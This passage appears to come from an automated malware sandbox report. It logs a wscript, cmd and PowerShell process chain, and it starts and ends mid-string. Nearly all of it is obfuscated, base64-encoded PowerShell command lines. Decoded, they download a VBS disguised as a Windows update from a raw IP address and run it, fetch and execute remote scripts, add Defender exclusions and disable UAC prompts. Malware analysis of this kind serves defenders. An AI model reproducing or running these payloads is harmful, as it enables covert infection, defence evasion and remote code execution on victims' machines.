kRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwY